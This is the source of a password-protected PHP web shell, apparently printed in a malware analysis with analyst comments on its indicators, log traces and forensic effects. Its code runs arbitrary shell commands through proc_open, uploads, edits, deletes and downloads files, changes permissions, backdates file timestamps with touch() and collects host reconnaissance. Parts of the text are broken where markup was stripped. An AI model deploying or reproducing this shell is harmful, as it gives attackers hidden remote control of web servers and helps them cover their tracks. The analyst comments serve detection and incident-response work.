change directory
* - Click file -> open editor (edit file)
* - Show numeric chmod, modified date, owner/group
* - Rename / Chmod / Edit Date / Delete / Download
* - Single command output (no duplicate)
* - Server Info panel
* - Colored Perm column: green = full access, orange = partial (no write), red = denied
*/
// Analyst note: this is the bootstrap of a password-gated PHP web shell
// (file manager plus command runner, per the feature list in the header above).
// All PHP error reporting is switched off and the execution time limit is
// removed, so failures stay silent and long-running requests are not cut short.
error_reporting(0);
set_time_limit(0);
session_start();
/* ========== CONFIG ========== */
// Hardcoded plaintext secret, compared directly with $_POST['pwd'] below.
// Because it is a static literal, it is also a usable string to hunt for when
// looking for other copies of this file on a host or in backups.
$PASSWORD = 'masterpiece11';
// Failed logins allowed before the lock, and the lock duration in seconds.
$MAX_ATTEMPTS = 6;
$LOCK_SECONDS = 300;
// Not referenced anywhere in the visible part of the file; presumably read by
// resolve_path(), which is defined outside this excerpt — confirm.
$ALLOW_BROWSE_ROOT = true;
// Timeout in seconds handed to run_command() by the command handler.
$CMD_TIMEOUT = 8;
/* ============================ */
/* --- login/brute force --- */
// The attempt counter and the lock deadline are kept in $_SESSION, i.e. they
// are per-session state rather than per-client or global state.
if (!isset($_SESSION['attempts'])) $_SESSION['attempts'] = 0;
if (!isset($_SESSION['locked_until'])) $_SESSION['locked_until'] = 0;
// ?logout drops the session's "logged" flag and redirects to the same URI
// with the query string stripped.
if (isset($_GET['logout'])) {
unset($_SESSION['logged']);
header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?'));
exit;
}
$now = time();
$login_error = '';
// While the lock deadline is in the future, no password is evaluated at all.
if ($now < $_SESSION['locked_until']) {
$login_error = "Too many attempts. Try again after " . date('Y-m-d H:i:s', $_SESSION['locked_until']);
} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pwd']) && empty($_SESSION['logged'])) {
// Login attempt: a POST carrying "pwd" from a session that is not yet logged in.
// Log artefact: a successful login is a POST to this script answered by a
// redirect back to the same path; a failed one renders the login page again.
if ($_POST['pwd'] === $PASSWORD) {
$_SESSION['logged'] = true;
$_SESSION['attempts'] = 0;
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
} else {
$_SESSION['attempts'] += 1;
// Once the counter reaches the limit, set the lock deadline; the counter
// itself is only reset by a successful login.
if ($_SESSION['attempts'] >= $MAX_ATTEMPTS) {
$_SESSION['locked_until'] = time() + $LOCK_SECONDS;
$login_error = "Too many attempts. Locked for {$LOCK_SECONDS} seconds.";
} else {
$login_error = "Wrong password. Attempts: {$_SESSION['attempts']}/{$MAX_ATTEMPTS}";
}
}
}
if (empty($_SESSION['logged'])) {
?>
Login — DS
DS — Login
=htmlspecialchars($login_error)?>
Press L to quick prompt
&1');
if ($out !== null) return rtrim($out, "\n");
}
// proc_open fallback
if (function_exists('proc_open') && !in_array('proc_open', array_map('trim', explode(',', ini_get('disable_functions'))))) {
$des = [1 => ['pipe','w'], 2 => ['pipe','w']];
$proc = @proc_open($cmd, $des, $pipes);
if (is_resource($proc)) {
stream_set_blocking($pipes[1], false);
stream_set_blocking($pipes[2], false);
$out = ''; $err = ''; $start = time();
while (true) {
$r = [$pipes[1], $pipes[2]]; $w = $e = null;
$ready = @stream_select($r, $w, $e, 0, 200000);
if ($ready > 0) {
foreach ($r as $pipe) {
$chunk = stream_get_contents($pipe);
if ($chunk !== false) {
if ($pipe === $pipes[1]) $out .= $chunk; else $err .= $chunk;
}
}
}
$status = proc_get_status($proc);
if (!$status['running']) break;
if ((time() - $start) > $timeout) {
proc_terminate($proc);
$out .= "\n[Terminated: timeout {$timeout}s]";
break;
}
usleep(100000);
}
$out .= stream_get_contents($pipes[1]);
$err .= stream_get_contents($pipes[2]);
foreach ($pipes as $p) @fclose($p);
@proc_close($proc);
$combined = trim($out . "\n" . $err);
return $combined === '' ? '[No output]' : $combined;
}
}
return "[Command disabled on this server]";
}
/**
 * Build the "owner:group" label shown in the listing for one path.
 *
 * Starts from the numeric uid/gid returned by fileowner()/filegroup() and
 * replaces each with its account/group name when the posix extension is
 * available and the lookup returns a 'name' entry.
 *
 * @param string $path Filesystem path to inspect.
 * @return mixed Result of h() applied to "owner:group". h() is defined outside
 *               this excerpt; presumably it HTML-escapes — confirm. The listing
 *               template echoes this value without a further h() call.
 */
function owner_group($path) {
// Warnings are suppressed; on failure both calls return false.
$owner = @fileowner($path);
$group = @filegroup($path);
// Default to the numeric ids (or false) when no name can be resolved.
$on = $owner;
$gn = $group;
if (function_exists('posix_getpwuid') && $owner !== false) {
$pw = @posix_getpwuid($owner);
if ($pw && isset($pw['name'])) $on = $pw['name'];
}
if (function_exists('posix_getgrgid') && $group !== false) {
$gr = @posix_getgrgid($group);
if ($gr && isset($gr['name'])) $gn = $gr['name'];
}
// A false owner or group concatenates as an empty string here.
return h($on . ':' . $gn);
}
/**
 * Pick the CSS class used to colour the Perm column for one path.
 *
 * The result reflects what the PHP process itself may do with the path
 * (is_readable / is_writable), not the file's mode bits. This tells the
 * operator at a glance which files the web server account can modify.
 *
 * @param string $path Filesystem path to test.
 * @return string 'perm-green' when readable and writable, 'perm-red' when
 *                neither, 'perm-orange' for every other combination (readable
 *                only, or writable only).
 */
function perm_color($path) {
$read = is_readable($path);
$write = is_writable($path);
// exec isn't critical here; use it as additional sign
// NOTE(review): $exec is computed but never read in this function.
$exec = is_executable($path);
if ($read && $write) return 'perm-green';
if (!$read && !$write) return 'perm-red';
return 'perm-orange';
}
/* ---------------- Main ---------------- */
// Request dispatcher of the web shell. Every branch below acts on the host's
// filesystem, or runs a command, with the privileges of the PHP process.
// Triage note: the POST handlers take their parameters from the request body,
// which ordinary access logs do not record; only the ?path= and download
// parameters are visible in the query string.
//
// Working directory comes from the "path" request parameter (GET, POST or
// cookie via $_REQUEST). resolve_path() is defined outside this excerpt; it is
// used here as "returns false when the path is rejected" — confirm its rules.
$raw_path = isset($_REQUEST['path']) ? $_REQUEST['path'] : getcwd();
$resolved = resolve_path($raw_path);
if ($resolved === false) { $message = "Access denied or invalid path."; $cwd = getcwd(); }
else { $cwd = is_file($resolved) ? dirname($resolved) : $resolved; }
@chdir($cwd);
// NOTE(review): $message is reset here, so the "Access denied" text assigned
// just above is never displayed.
$message = ''; $cmd_output = ''; $edit_target = null; $edit_content = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// upload
// Writes the uploaded file into $cwd under the client-supplied name.
// basename() only strips directory components; there is no check on the
// extension or content. Indicator: multipart POST with field "upload_file",
// followed by a new file appearing in a web-served directory.
if (isset($_POST['upload']) && isset($_FILES['upload_file'])) {
$up = $_FILES['upload_file'];
if (is_uploaded_file($up['tmp_name'])) {
$dest = $cwd . DIRECTORY_SEPARATOR . basename($up['name']);
if (move_uploaded_file($up['tmp_name'], $dest)) $message = "Uploaded: " . basename($up['name']);
else $message = "Upload failed (permission?).";
} else $message = "No file uploaded.";
}
// create file
// Creates (or truncates to zero bytes) a file named by "newfile_name" in $cwd.
// The redirect that follows discards $message, so the result is never shown.
if (!empty($_POST['newfile_name'])) {
$nf = basename($_POST['newfile_name']);
$p = $cwd . DIRECTORY_SEPARATOR . $nf;
if (@file_put_contents($p, '') !== false) {
$message = "File created: $nf";
} else $message = "Failed to create file: $nf";
header('Location: ?path=' . urlencode($cwd));
exit;
}
// create dir
// Creates a directory named by "newdir_name" in $cwd with mode 0755, then
// redirects (again dropping $message).
if (!empty($_POST['newdir_name'])) {
$nd = basename($_POST['newdir_name']);
$p = $cwd . DIRECTORY_SEPARATOR . $nd;
if (@mkdir($p, 0755)) $message = "Folder created: $nd";
else $message = "Failed to create folder: $nd";
header('Location: ?path=' . urlencode($cwd));
exit;
}
// actions: delete/rename/chmod/edit/editdate
// "action" selects the operation, "target" the path it is applied to.
if (isset($_POST['action'])) {
$action = $_POST['action'];
$t = isset($_POST['target']) ? resolve_path($_POST['target']) : false;
// edit: overwrite an existing file with the posted "content" verbatim.
// This is how existing application files can be modified in place, so
// integrity-check web roots against a known-good copy after finding this file.
if ($action === 'edit' && isset($_POST['target']) && isset($_POST['content'])) {
// The target is resolved a second time here; the result is the same as above.
$t = resolve_path($_POST['target']);
if ($t && is_file($t)) {
if (@file_put_contents($t, $_POST['content']) !== false) $message = "File saved.";
else $message = "Save failed (permission?).";
} else $message = "Edit target invalid.";
} elseif ($t && file_exists($t)) {
// delete: rmdir() for directories (only succeeds when empty), unlink() for files.
if ($action === 'delete') {
if (is_dir($t)) {
if (@rmdir($t)) $message = "Folder deleted.";
else $message = "Failed to delete folder (not empty or permission).";
} else {
if (@unlink($t)) $message = "File deleted.";
else $message = "Failed to delete file (permission?).";
}
} elseif ($action === 'rename') {
// rename: new name is reduced to its basename, so the entry stays in
// the same directory as the target.
$nn = isset($_POST['newname']) ? basename($_POST['newname']) : '';
if ($nn !== '') {
$dst = dirname($t) . DIRECTORY_SEPARATOR . $nn;
if (@rename($t, $dst)) $message = "Renamed to $nn";
else $message = "Rename failed.";
} else $message = "Invalid new name.";
} elseif ($action === 'chmod') {
// chmod: "perm" is parsed as an octal string; an empty or non-numeric
// value parses to 0 and is applied as mode 0000.
$perm = isset($_POST['perm']) ? $_POST['perm'] : '';
$mode = intval($perm, 8);
if (@chmod($t, $mode)) $message = "Permissions set to " . sprintf('%04o', $mode);
else $message = "Chmod failed (permission?).";
} elseif ($action === 'editdate') {
// editdate: sets the target's modification time to an arbitrary
// caller-chosen value via touch(). Forensic consequence: mtime on files
// under any directory this script could reach is not trustworthy; on
// POSIX filesystems compare it with the inode change time (ctime), which
// touch() cannot set to a chosen value.
$nd = isset($_POST['newdatetime']) ? $_POST['newdatetime'] : '';
$dt = DateTime::createFromFormat('Y-m-d\TH:i', $nd);
if ($dt) {
if (@touch($t, $dt->getTimestamp())) $message = "Timestamp updated.";
else $message = "Failed to update timestamp (permission?).";
} else $message = "Invalid input for edit date.";
}
}
}
// command (top)
// Passes the posted "command" string unmodified to run_command() together
// with $CMD_TIMEOUT. Host-side indicator: the web server / PHP worker process
// spawning child processes it does not start during normal operation.
if (isset($_POST['command']) && trim($_POST['command']) !== '') {
$cmd_output = run_command($_POST['command'], $CMD_TIMEOUT);
}
}
// download via GET
// Streams any file accepted by resolve_path() back as an attachment. Unlike
// the POST actions, "download" and "target" appear in the query string, so
// access logs show which files were pulled and the response sizes.
if (isset($_GET['download']) && isset($_GET['target'])) {
$t = resolve_path($_GET['target']);
if ($t && is_file($t)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($t) . '"');
header('Content-Length: ' . filesize($t));
readfile($t);
exit;
} else {
$message = "Download failed: file not found or access denied.";
}
}
// prepare listing
// Split the entries of $cwd into directories and files, each sorted
// case-insensitively in natural order, directories first in $all.
$items = @scandir($cwd);
$dirs = []; $files = [];
if ($items && is_array($items)) {
foreach ($items as $it) {
if ($it === '.' || $it === '..') continue;
$full = $cwd . DIRECTORY_SEPARATOR . $it;
if (is_dir($full)) $dirs[] = $it; else $files[] = $it;
}
sort($dirs, SORT_NATURAL|SORT_FLAG_CASE);
sort($files, SORT_NATURAL|SORT_FLAG_CASE);
}
$all = array_merge($dirs, $files);
/* breadcrumbs */
/**
 * Turn the current directory into a list of breadcrumb entries.
 *
 * @param string $cwd Directory path; indexed at [0], so it is expected to be
 *                    non-empty.
 * @return array List of ['name' => label, 'path' => accumulated path] entries,
 *               starting with a '/' entry when $cwd begins with a slash.
 */
function crumbs($cwd){
// NOTE(review): the pattern '#/+/#' needs at least two consecutive slashes to
// match, so a path with single separators is returned as one part instead of
// one part per directory — this looks unintended; confirm against the template.
$parts = preg_split('#/+/#', $cwd, -1, PREG_SPLIT_NO_EMPTY);
$crumbs = [];
// $acc holds the path built so far; it starts at '/' for absolute paths.
$acc = ($cwd[0] === '/') ? '/' : '';
if ($acc === '/') $crumbs[] = ['name'=>'/','path'=>'/'];
foreach ($parts as $p) {
// Avoid a doubled separator directly after the root or at the very start.
if ($acc === '/' || $acc === '') $acc .= $p; else $acc .= '/' . $p;
$crumbs[] = ['name'=>$p, 'path'=>$acc];
}
return $crumbs;
}
/**
 * Collect the host details shown in the "Server Info" panel.
 *
 * Analyst note: this is host reconnaissance data handed to whoever is logged
 * in to the shell — PHP version, kernel/OS string, script owner, the
 * disable_functions list (which shows what execution primitives remain
 * available), disk, load, uptime and CPU model.
 *
 * @return array Map of display label => value; optional entries (Disk, Load
 *               Average, Uptime, CPU Model) are present only when the
 *               underlying lookup succeeded.
 */
function server_info() {
$info = [];
$info['PHP Version'] = PHP_VERSION;
$info['OS'] = php_uname();
// get_current_user() reports the owner of the running script file.
$info['User'] = get_current_user();
$info['CWD'] = getcwd();
$info['Memory Limit'] = ini_get('memory_limit');
$info['Upload Max Filesize'] = ini_get('upload_max_filesize');
$info['Post Max Size'] = ini_get('post_max_size');
$info['Max Execution Time'] = ini_get('max_execution_time');
$info['Disabled Functions'] = ini_get('disable_functions') ?: '(none)';
// safe_mode was removed in PHP 5.4, so on current PHP this shows '(n/a)'.
$info['Safe Mode'] = ini_get('safe_mode') ? ini_get('safe_mode') : '(n/a)';
// Each disk_*_space() call is made twice: once for the check, once for the value.
$df = @disk_free_space('.') !== false ? @disk_free_space('.') : null;
$dt = @disk_total_space('.') !== false ? @disk_total_space('.') : null;
if ($df !== null && $dt !== null) $info['Disk'] = round($df/1024/1024,2) . ' MB free / ' . round($dt/1024/1024,2) . ' MB total';
$load = function_exists('sys_getloadavg') ? @sys_getloadavg() : null;
if ($load) $info['Load Average'] = implode(', ', $load);
// uptime (linux)
if (is_readable('/proc/uptime')) {
$u = @file_get_contents('/proc/uptime');
if ($u) {
// First field of /proc/uptime is seconds since boot. Formatting it with
// 'H:i:s' only shows the time-of-day part, so it wraps after 24 hours.
$s = floatval(explode(' ', $u)[0]);
$info['Uptime'] = gmdate('H:i:s', (int)$s);
}
}
// cpu info (linux)
if (is_readable('/proc/cpuinfo')) {
$c = @file_get_contents('/proc/cpuinfo');
if ($c) {
// Only the first "model name" line is used.
if (preg_match('/model name\s+:\s+(.+)/', $c, $m)) $info['CPU Model'] = trim($m[1]);
}
}
return $info;
}
?>
DEWASHL — =h($cwd)?>
=h($message)?>
| Name | Perm | Owner/Group | Modified | Size | Actions |
⬆ Parent: ' . h($parent) . ' | ';
}
foreach ($dirs as $d):
$full = $cwd . DIRECTORY_SEPARATOR . $d;
$perms = @fileperms($full) ? sprintf('%04o', fileperms($full) & 07777) : '----';
$mtime = is_file($full) || is_dir($full) ? date('Y-m-d H:i:s', @filemtime($full)) : '-';
$og = owner_group($full);
$pclass = perm_color($full);
?>
| 📁 =h($d)?> |
=h($perms)?> |
= $og ?> |
=h($mtime)?> |
- |
RENAME
CHMD
DATE
DEL
|
| 📄 =h($f)?> |
=h($perms)?> |
= $og ?> |
=h($mtime)?> |
=h($size)?> |
DWNLD
RENAME
CHMOD
DATE
DEL
|
Server Info
$v): ?>
=h($k)?>: =h((string)$v)?>
✏ Edit: =h(basename($edit_target))?>
Klik nama file untuk mengedit. Klik folder untuk pindah direktori.